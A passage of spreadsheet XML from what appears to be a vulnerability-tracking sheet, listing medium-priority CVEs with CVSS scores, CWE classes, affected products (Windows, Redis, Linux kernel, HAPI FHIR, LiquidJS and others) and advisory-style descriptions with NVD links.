          <t>HAPI FHIR is a complete implementation of the HL7 FHIR standard for healthcare interoperability in Java. Prior to 6.9.11, XhtmlParser.java imposes no maximum element nesting depth, so a deeply nested text.div narrative triggers unbounded recursion between parseElementInner() and parseElement(), raising a StackOverflowError. An attacker who can submit FHIR resources containing such narratives can thus crash a parsing or validation worker thread, affecting validator services and any application that parses attacker-supplied FHIR JSON or XML. This issue is fixed in version 6.9.11.</t>
        </is>
      </c>
      <c r="M1057" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62296</t>
        </is>
      </c>
    </row>
    <row r="1058">
      <c r="A1058" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1058" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62759</t>
        </is>
      </c>
      <c r="C1058" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1058" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1058" s="5" t="inlineStr"/>
      <c r="F1058" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1058" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1058" s="5" t="inlineStr"/>
      <c r="I1058" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1058" s="5" t="inlineStr"/>
      <c r="K1058" s="5" t="inlineStr">
        <is>
          <t>CWE-290</t>
        </is>
      </c>
      <c r="L1058" s="5" t="inlineStr">
        <is>
          <t>Authentication bypass by spoofing in Windows Netlogon allows an unauthorized attacker to perform spoofing over an adjacent network.</t>
        </is>
      </c>
      <c r="M1058" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62759</t>
        </is>
      </c>
    </row>
    <row r="1059">
      <c r="A1059" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1059" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-62813</t>
        </is>
      </c>
      <c r="C1059" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1059" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1059" s="5" t="inlineStr"/>
      <c r="F1059" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1059" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H1059" s="5" t="inlineStr"/>
      <c r="I1059" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1059" s="5" t="inlineStr"/>
      <c r="K1059" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1059" s="5" t="inlineStr">
        <is>
          <t>Use after free in Active Directory Domain Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1059" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-62813</t>
        </is>
      </c>
    </row>
    <row r="1060">
      <c r="A1060" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1060" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63408</t>
        </is>
      </c>
      <c r="C1060" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1060" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1060" s="5" t="inlineStr"/>
      <c r="F1060" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1060" s="5" t="inlineStr">
        <is>
          <t>apache</t>
        </is>
      </c>
      <c r="H1060" s="5" t="inlineStr"/>
      <c r="I1060" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1060" s="5" t="inlineStr"/>
      <c r="K1060" s="5" t="inlineStr">
        <is>
          <t>CWE-598</t>
        </is>
      </c>
      <c r="L1060" s="5" t="inlineStr">
        <is>
          <t>Grav API Plugin is a RESTful API for Grav CMS that provides full headless access to your site's content.  Prior to 1.0.0-rc.16, the Grav API plugin JwtAuthenticator::extractBearerToken() accepts a JWT from the token URL query parameter on every /api/v1 route, including state-changing endpoints. Request URLs consequently expose valid access tokens through Apache, proxy, and CDN logs, browser history, and Referer headers, allowing a party with access to those records to reuse the token with the owner's API privileges. This issue is fixed in version 1.0.0-rc.16.</t>
        </is>
      </c>
      <c r="M1060" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63408</t>
        </is>
      </c>
    </row>
    <row r="1061">
      <c r="A1061" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1061" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63421</t>
        </is>
      </c>
      <c r="C1061" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1061" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1061" s="5" t="inlineStr"/>
      <c r="F1061" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1061" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1061" s="5" t="inlineStr"/>
      <c r="I1061" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="J1061" s="5" t="inlineStr"/>
      <c r="K1061" s="5" t="inlineStr">
        <is>
          <t>CWE-20, CWE-480</t>
        </is>
      </c>
      <c r="L1061" s="5" t="inlineStr">
        <is>
          <t>Keystone is a content management system for Node.js. Prior to 6.5.3, the findMany resolver in packages/core/src/lib/core/queries/resolvers.ts compares the signed take argument directly with graphql.maxTake, allowing a remote unauthenticated GraphQL client to provide a negative take value whose magnitude exceeds the configured bound. The bypass also applies to relationship queries and can return more records than the developer intended, potentially exhausting service resources. This issue is fixed in version 6.5.3.</t>
        </is>
      </c>
      <c r="M1061" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63421</t>
        </is>
      </c>
    </row>
    <row r="1062">
      <c r="A1062" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1062" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-64374</t>
        </is>
      </c>
      <c r="C1062" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1062" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1062" s="5" t="inlineStr"/>
      <c r="F1062" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1062" s="5" t="inlineStr">
        <is>
          <t>linux kernel</t>
        </is>
      </c>
      <c r="H1062" s="5" t="inlineStr">
        <is>
          <t>linux:linux_kernel</t>
        </is>
      </c>
      <c r="I1062" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J1062" s="5" t="inlineStr"/>
      <c r="K1062" s="5" t="inlineStr">
        <is>
          <t>CWE-667</t>
        </is>
      </c>
      <c r="L1062" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
sched/rt: Have RT_PUSH_IPI be default off for non PREEMPT_RT
RT migration is done aggressively. When a CPU schedules out a high
priority RT task for a lower priority task, it will look to see if there's
any RT tasks that are waiting to run on another CPU that is of higher
priority than the task this CPU is about to run. If it finds one, it will
pull that task over to the CPU and allow it to run there instead.
Normally, this pulling is done by looking at the RT overloaded mask (rto)
which contains all the CPUs in the scheduler domain with RT tasks that are
waiting to run due to a higher priority RT task currently running on their
CPU. The CPU that is about to schedule a lower priority task will grab the
rq lock of the overloaded CPU and move the RT task from that CPU's runqueue
to the local one and schedule the higher priority RT task.
This caused issues when a lot of CPUs would schedule a lower priority task
at the same time. They would all try to grab the same runqueue lock of
the CPU with the overloaded RT tasks. Only the first CPU that got in will
get that task. All the others would wait until they got the runqueue lock
and see there's nothing to pull and do nothing. On systems with lots of
CPUs, this caused a large latency (up to 500us) which is beyond what
PREEMPT_RT is to allow.
The solution to that was to create an RT_PUSH_IPI logic. When any CPU
wanted to pull a task, instead of grabbing the runqueue lock of the
overloaded CPU, it would start by sending an IPI to the overloaded CPU,
and that IPI handler would have the CPU with the waiting RT task do a push
instead. Then that handler would send an IPI to the next CPU with
overloaded RT tasks, and so on. Note, after the first CPU starts this
process, if another CPU wanted to do a pull, it would see that the process
has already begun and would only increment a counter to have the IPIs
continue again.
The RT_PUSH_IPI solved the latency problem with PREEMPT_RT but could cause
a new issue with non PREEMPT_RT. Namely, softirqs run in a threaded
context on PREEMPT_RT but they can run in an interrupt context in non-RT.
If an IPI lands on a CPU that has just woken up multiple RT tasks and the
current CPU is running a non RT or a low priority RT task, instead of
doing a push, it would simply do a schedule on that CPU. But if a softirq
was also executing on this CPU, the schedule would need to wait until the
softirq finished. Until then, the CPU would still be considered overloaded
as there are RT tasks still waiting to run on it.
A live lock occurred on a workload that was doing heavy networking traffic
on a large machine where the softirqs would run 500us out of 750us. And it
would also be waking up RT tasks, causing the RT pull logic to be
constantly executed.
When a softirq triggered on a CPU with RT tasks queued but not running
yet, and the other CPUs would see this CPU as being overloaded, they would
send an IPI over to it. The CPU would notice that the waiting RT tasks are
of higher priority than the currently running task and simply schedule
that CPU instead. But because the softirq was executing, before it could
schedule, it would receive another IPI to do the same. The amount of IPIs
would slow down the currently running softirq so much that before it could
return back to task context, it would execute another softirq never
allowing the CPU to schedule. This live locked that CPU.
As RT_PUSH_IPI was created to help PREEMPT_RT, make it default off if
PREEMPT_RT is not enabled.</t>
        </is>
      </c>
      <c r="M1062" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-64374</t>
        </is>
      </c>
    </row>
    <row r="1063">
      <c r="A1063" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1063" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-66373</t>
        </is>
      </c>
      <c r="C1063" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1063" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1063" s="5" t="inlineStr"/>
      <c r="F1063" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1063" s="5" t="inlineStr">
        <is>
          <t>redis</t>
        </is>
      </c>
      <c r="H1063" s="5" t="inlineStr"/>
      <c r="I1063" s="5" t="inlineStr">
        <is>
          <t>2026-07-25</t>
        </is>
      </c>
      <c r="J1063" s="5" t="inlineStr"/>
      <c r="K1063" s="5" t="inlineStr">
        <is>
          <t>CWE-415</t>
        </is>
      </c>
      <c r="L1063" s="5" t="inlineStr">
        <is>
          <t>Redis before 8.8.0, in the unusual case where an authenticated attacker can execute RESTORE, allows remote code execution via a RESTORE payload where the same NACK (pending entry) is referenced by more than one consumer, because deleting both consumers via XGROUP DELCONSUMER leads to a double free. NOTE: this issue exists because of an incomplete fix for CVE-2026-25243.</t>
        </is>
      </c>
      <c r="M1063" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-66373</t>
        </is>
      </c>
    </row>
    <row r="1064">
      <c r="A1064" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1064" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-67422</t>
        </is>
      </c>
      <c r="C1064" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1064" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1064" s="5" t="inlineStr"/>
      <c r="F1064" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1064" s="5" t="inlineStr">
        <is>
          <t>python</t>
        </is>
      </c>
      <c r="H1064" s="5" t="inlineStr"/>
      <c r="I1064" s="5" t="inlineStr">
        <is>
          <t>2026-08-06</t>
        </is>
      </c>
      <c r="J1064" s="5" t="inlineStr"/>
      <c r="K1064" s="5" t="inlineStr">
        <is>
          <t>CWE-1333</t>
        </is>
      </c>
      <c r="L1064" s="5" t="inlineStr">
        <is>
          <t>pymdown-extensions is a collection of extensions for the Python Markdown library. In versions up to and including 11.0, four inline processors (caret, tilde, betterem, and magiclink) use regular expressions whose content groups can partition a run of delimiter characters in exponentially many ways, causing catastrophic backtracking. As a result, a single untrusted Markdown line under 50 bytes rendered with markdown.markdown() in each extension's default configuration drives the rendering thread into unbounded CPU usage that grows exponentially with input length, enabling an unauthenticated remote attacker who can submit Markdown to cause denial of service. The exposure is concrete for web applications that render user-supplied Markdown (comments, wikis, issue bodies, live preview), including any app using pymdownx.extra which bundles the vulnerable betterem default, as well as hosted docs/CI systems that build untrusted Markdown. The issue has been fixed in version 11.0.1.</t>
        </is>
      </c>
      <c r="M1064" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-67422</t>
        </is>
      </c>
    </row>
    <row r="1065">
      <c r="A1065" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1065" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-68887</t>
        </is>
      </c>
      <c r="C1065" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1065" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1065" s="5" t="inlineStr"/>
      <c r="F1065" s="5" t="n">
        <v>0.008</v>
      </c>
      <c r="G1065" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1065" s="5" t="inlineStr"/>
      <c r="I1065" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1065" s="5" t="inlineStr"/>
      <c r="K1065" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1065" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Message Queuing Queue Manager allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1065" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-68887</t>
        </is>
      </c>
    </row>
    <row r="1066">
      <c r="A1066" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1066" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69222</t>
        </is>
      </c>
      <c r="C1066" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1066" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1066" s="5" t="inlineStr"/>
      <c r="F1066" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1066" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1066" s="5" t="inlineStr"/>
      <c r="I1066" s="5" t="inlineStr">
        <is>
          <t>2026-08-19</t>
        </is>
      </c>
      <c r="J1066" s="5" t="inlineStr"/>
      <c r="K1066" s="5" t="inlineStr">
        <is>
          <t>CWE-400</t>
        </is>
      </c>
      <c r="L1066" s="5" t="inlineStr">
        <is>
          <t>LiquidJS is a Shopify / GitHub Pages compatible template engine in pure JavaScript. Prior to 10.27.2, the join filter in src/filters/array.ts computes complexity from array.length and separator length instead of the total string length produced by array.join(sep). The concat filter can cheaply double arrays of references, after which join materializes the referenced content while charging only for element count, allowing a template to exceed a configured memoryLimit by a large factor. The sibling array_to_sentence_string filter in src/filters/string.ts has the same accounting defect, and a crafted template can allocate toward V8's string or process memory limit and crash the process. This issue is fixed in version 10.27.2.</t>
        </is>
      </c>
      <c r="M1066" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69222</t>
        </is>
      </c>
    </row>
    <row r="1067">
      <c r="A1067" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1067" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69342</t>
        </is>
      </c>
      <c r="C1067" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1067" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1067" s="5" t="inlineStr"/>
      <c r="F1067" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1067" s="5" t="inlineStr">
        <is>
          <t>microsoft, windows</t>
        </is>
      </c>
      <c r="H1067" s="5" t="inlineStr">
        <is>
          <t>microsoft:windows_10_1607, microsoft:windows_10_1809, microsoft:windows_server_2012, microsoft:windows_server_2016, microsoft:windows_server_2019, microsoft:windows_server_2022, microsoft:windows_server_2025</t>
        </is>
      </c>
      <c r="I1067" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1067" s="5" t="inlineStr"/>
      <c r="K1067" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1067" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows DHCP Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1067" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69342</t>
        </is>
      </c>
    </row>
    <row r="1068">
      <c r="A1068" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1068" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69378</t>
        </is>
      </c>
      <c r="C1068" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1068" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1068" s="5" t="inlineStr"/>
      <c r="F1068" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1068" s="5" t="inlineStr">
        <is>
          <t>microsoft</t>
        </is>
      </c>
      <c r="H1068" s="5" t="inlineStr"/>
      <c r="I1068" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1068" s="5" t="inlineStr"/>
      <c r="K1068" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L1068" s="5" t="inlineStr">
        <is>
          <t>Uncontrolled recursion in Microsoft Exchange Server allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1068" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69378</t>
        </is>
      </c>
    </row>
    <row r="1069">
      <c r="A1069" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1069" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69397</t>
        </is>
      </c>
      <c r="C1069" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1069" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1069" s="5" t="inlineStr"/>
      <c r="F1069" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1069" s="5" t="inlineStr">
        <is>
          <t>windows, openssh</t>
        </is>
      </c>
      <c r="H1069" s="5" t="inlineStr"/>
      <c r="I1069" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1069" s="5" t="inlineStr"/>
      <c r="K1069" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1069" s="5" t="inlineStr">
        <is>
          <t>Use after free in OpenSSH for Windows allows an unauthorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1069" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69397</t>
        </is>
      </c>
    </row>
    <row r="1070">
      <c r="A1070" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1070" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69428</t>
        </is>
      </c>
      <c r="C1070" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1070" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1070" s="5" t="inlineStr"/>
      <c r="F1070" s="5" t="n">
        <v>0.011</v>
      </c>
      <c r="G1070" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1070" s="5" t="inlineStr"/>
      <c r="I1070" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1070" s="5" t="inlineStr"/>
      <c r="K1070" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1070" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows LDAP - Lightweight Directory Access Protocol allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1070" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69428</t>
        </is>
      </c>
    </row>
    <row r="1071">
      <c r="A1071" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1071" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69429</t>
        </is>
      </c>
      <c r="C1071" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1071" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1071" s="5" t="inlineStr"/>
      <c r="F1071" s="5" t="n">
        <v>0.006</v>
      </c>
      <c r="G1071" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1071" s="5" t="inlineStr"/>
      <c r="I1071" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1071" s="5" t="inlineStr"/>
      <c r="K1071" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1071" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows IKE Extension allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1071" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69429</t>
        </is>
      </c>
    </row>
    <row r="1072">
      <c r="A1072" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1072" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69443</t>
        </is>
      </c>
      <c r="C1072" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1072" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1072" s="5" t="inlineStr"/>
      <c r="F1072" s="5" t="n">
        <v>0.01</v>
      </c>
      <c r="G1072" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1072" s="5" t="inlineStr"/>
      <c r="I1072" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1072" s="5" t="inlineStr"/>
      <c r="K1072" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1072" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows Device Health Attestation (DHA) allows an unauthorized attacker to disclose information over a network.</t>
        </is>
      </c>
      <c r="M1072" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69443</t>
        </is>
      </c>
    </row>
    <row r="1073">
      <c r="A1073" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1073" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69514</t>
        </is>
      </c>
      <c r="C1073" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1073" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1073" s="5" t="inlineStr"/>
      <c r="F1073" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1073" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1073" s="5" t="inlineStr"/>
      <c r="I1073" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1073" s="5" t="inlineStr"/>
      <c r="K1073" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1073" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1073" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69514</t>
        </is>
      </c>
    </row>
    <row r="1074">
      <c r="A1074" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1074" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69539</t>
        </is>
      </c>
      <c r="C1074" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1074" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1074" s="5" t="inlineStr"/>
      <c r="F1074" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="G1074" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1074" s="5" t="inlineStr"/>
      <c r="I1074" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1074" s="5" t="inlineStr"/>
      <c r="K1074" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1074" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1074" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69539</t>
        </is>
      </c>
    </row>
    <row r="1075">
      <c r="A1075" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1075" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69587</t>
        </is>
      </c>
      <c r="C1075" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1075" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1075" s="5" t="inlineStr"/>
      <c r="F1075" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G1075" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1075" s="5" t="inlineStr"/>
      <c r="I1075" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1075" s="5" t="inlineStr"/>
      <c r="K1075" s="5" t="inlineStr">
        <is>
          <t>CWE-476</t>
        </is>
      </c>
      <c r="L1075" s="5" t="inlineStr">
        <is>
          <t>Null pointer dereference in Windows IKE Extension allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1075" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69587</t>
        </is>
      </c>
    </row>
    <row r="1076">
      <c r="A1076" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1076" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69588</t>
        </is>
      </c>
      <c r="C1076" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1076" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1076" s="5" t="inlineStr"/>
      <c r="F1076" s="5" t="n">
        <v>0.012</v>
      </c>
      <c r="G1076" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1076" s="5" t="inlineStr"/>
      <c r="I1076" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1076" s="5" t="inlineStr"/>
      <c r="K1076" s="5" t="inlineStr">
        <is>
          <t>CWE-401</t>
        </is>
      </c>
      <c r="L1076" s="5" t="inlineStr">
        <is>
          <t>Missing release of memory after effective lifetime in Windows TCP/IP allows an unauthorized attacker to deny service over a network.</t>
        </is>
      </c>
      <c r="M1076" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69588</t>
        </is>
      </c>
    </row>
    <row r="1077">
      <c r="A1077" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1077" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69599</t>
        </is>
      </c>
      <c r="C1077" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1077" s="5" t="inlineStr">
        <is>
          <t>HIGH</t>
        </is>
      </c>
      <c r="E1077" s="5" t="inlineStr"/>
      <c r="F1077" s="5" t="n">
        <v>0.007</v>
      </c>
      <c r="G1077" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1077" s="5" t="inlineStr"/>
      <c r="I1077" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1077" s="5" t="inlineStr"/>
      <c r="K1077" s="5" t="inlineStr">
        <is>
          <t>CWE-416</t>
        </is>
      </c>
      <c r="L1077" s="5" t="inlineStr">
        <is>
          <t>Use after free in Windows Remote Desktop Services allows an authorized attacker to execute code over a network.</t>
        </is>
      </c>
      <c r="M1077" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69599</t>
        </is>
      </c>
    </row>
    <row r="1078">
      <c r="A1078" s="5" t="inlineStr">
        <is>
          <t>P3 - Medium</t>
        </is>
      </c>
      <c r="B1078" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69607</t>
        </is>
      </c>
      <c r="C1078" s="5" t="n">
        <v>7.5</v>
      </c>
      <c r="D1078" s="5" t="inlineStr">
